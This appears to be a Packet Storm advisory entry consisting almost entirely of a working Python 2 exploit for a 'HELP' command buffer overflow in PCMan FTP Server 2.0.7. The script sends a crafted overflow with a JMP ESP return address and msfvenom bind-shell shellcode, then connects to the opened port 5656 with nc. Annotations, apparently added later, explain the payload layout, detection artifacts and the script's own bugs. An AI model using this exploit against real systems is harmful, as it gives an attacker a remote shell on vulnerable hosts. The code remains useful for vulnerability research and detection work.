PCMan FTP Server 2.0.7 HELP Buffer Overflow

2016-11-09T00:00:00
ID PACKETSTORM:139656
Type packetstorm
Reporter Yunus YILDIRIM
Modified 2016-11-09T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#-*- coding: utf-8 -*-  
  
# Exploit Title: PCMan FTP Server 2.0.7 - 'HELP' Command Buffer Overflow   
# Date: 07/11/2016  
# Author: Yunus YILDIRIM (Th3GundY)  
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com  
# Website: http://yildirimyunus.com  
# Contact: yunusyildirim@protonmail.com  
# Tested on: Windows 7 Ultimate 32Bit  
  
import socket  
import sys  
import os  
import time  
  
def banner():  
# Print the tool's ASCII-art banner to stdout (Python 2 print statement).
# The local name `banner` shadows the function itself inside this body; that
# is harmless here because the function never calls itself.
banner = "\n\n"  
banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \n"  
banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n"  
banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"  
banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"  
banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \n"  
banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \n"  
banner +=" \n"   
print banner  
  
def exploit(target, port):  
# Send the HELP-command overflow to the FTP server at (target, port).
#
# Flow: connect and read the greeting, log in with USER/PASS, then send HELP
# with a ~2 KB argument that overwrites the saved return address. From a
# monitoring standpoint the two observable artifacts are the oversized HELP
# argument (no legitimate client sends one this long) and the new listener
# on TCP 5656 that the payload opens inside the FTP server process.
#
# Python 2 only: print statements, `except Exception, e`, `e.message`, and
# str literals being byte strings (which is what s.send() requires).
# Returns nothing; calls sys.exit() if the initial connection fails.
  
eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3 JMP ESP  
# Little-endian bytes of the 0x76B49CC3 address named in the comment above.
# Hard-coded, so it is only valid where that module is loaded at that base
# (the author's Windows 7 32-bit test box, per the header); a different or
# randomised module base breaks the jump — presumably why ASLR/DEP are the
# relevant mitigations for this bug.
  
# msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c  
# Payload emitted by the msfvenom line above: a bind shell listening on TCP
# 5656, encoded to avoid the listed bad characters. Nothing in this function
# verifies that it actually ran.
shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1"  
"\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f"  
"\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53"  
"\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16"  
"\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3"  
"\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d"  
"\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae"  
"\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29"  
"\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5"  
"\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43"  
"\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc"  
"\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4"  
"\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12"  
"\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49"  
"\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc"  
"\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2"  
"\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24"  
"\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59"  
"\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81"  
"\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5"  
"\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb"  
"\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5"  
"\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5"  
"\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93")  
  
# Layout: 2006 filler bytes up to the saved return address, the 4-byte
# JMP ESP address, a 21-byte NOP sled, then the payload (the jump is expected
# to land in the sled). Note `buffer` shadows the Python 2 builtin of that name.
buffer = 'A'*2006 + eip + "\x90"*21 + shellcode  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target,port))  
s.recv(1024)  # discard the server greeting; the reply is never inspected
print "[+] Connect to %s on port %d" % (target,port)  
except Exception, e:  
# `e.message` is Python 2-only (removed in Python 3) and may be empty for
# some exception types, so the printed reason can be blank.
print "[-] Could not create socket", e.message  
sys.exit(0)  # exits with status 0 even though this is the failure path
  
try:   
s.send('USER anonymous\r\n')  
s.recv(1024)  
s.send('PASS CT-Zer0\r\n')  
s.recv(1024)  
# Login replies are read but never checked, so a rejected login goes unnoticed
# and the HELP command is sent regardless.
s.send('HELP ' + buffer + '\r\n')  
print "[+] Exploit Sent Successfully"  
s.close()  
# Printed unconditionally: nothing confirms that port 5656 is actually open.
print '[+] You got bind shell on port 5656\n'  
time.sleep(2)  
# `target` comes straight from argv and is spliced into a shell command
# string; a list-form subprocess call would avoid shell interpretation.
# os.system() also does not raise on a missing or failing nc, so that case
# is silently ignored.
os.system('nc ' + target + ' 5656')  
except:  
# Bare except: any error in the block above (including KeyboardInterrupt
# during the sleep) is reported with this one misleading message.
print "[-] Could not connect to target"  
  
  
# Entry point: expects exactly two positional arguments, <IP> and <Port>
# (the `== 3` count includes argv[0], so extra arguments fall through to the
# usage branch). int() on a non-numeric port raises an uncaught ValueError
# before exploit() is reached.
if len(sys.argv) == 3:  
banner()  
target = sys.argv[1]  
port = int(sys.argv[2])  
exploit(target, port)  
else:  
banner()  
print "[*] Usage: python %s <IP> <Port>\n" % sys.argv[0]  
sys.exit(0)  # usage error still exits with status 0
`